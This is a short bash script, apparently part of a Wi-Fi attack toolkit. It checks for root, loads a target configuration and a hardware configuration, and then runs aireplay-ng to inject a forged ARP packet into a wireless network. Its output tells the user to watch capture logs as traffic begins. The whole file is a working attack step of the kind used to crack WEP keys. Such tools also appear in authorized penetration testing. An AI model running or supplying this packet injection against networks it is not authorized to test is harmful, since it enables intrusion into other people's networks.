#!/bin/bash

if [ "$(id -u)" != "0" ]; then
	echo "This script must be run as root" 1>&2
	exit 1
fi

if [ -f ../../cfg/target.conf ]; then
	. ../../cfg/target.conf
else
	echo "Error: No target set!"
	exit 1
fi

. ../../cfg/hardware.conf

echo "We will now start sending our fake packet to the ARP."
echo "Watch your capture logs. Traffic should begin immediately."
aireplay-ng -2 -r /tmp/fake-arp $WLAN
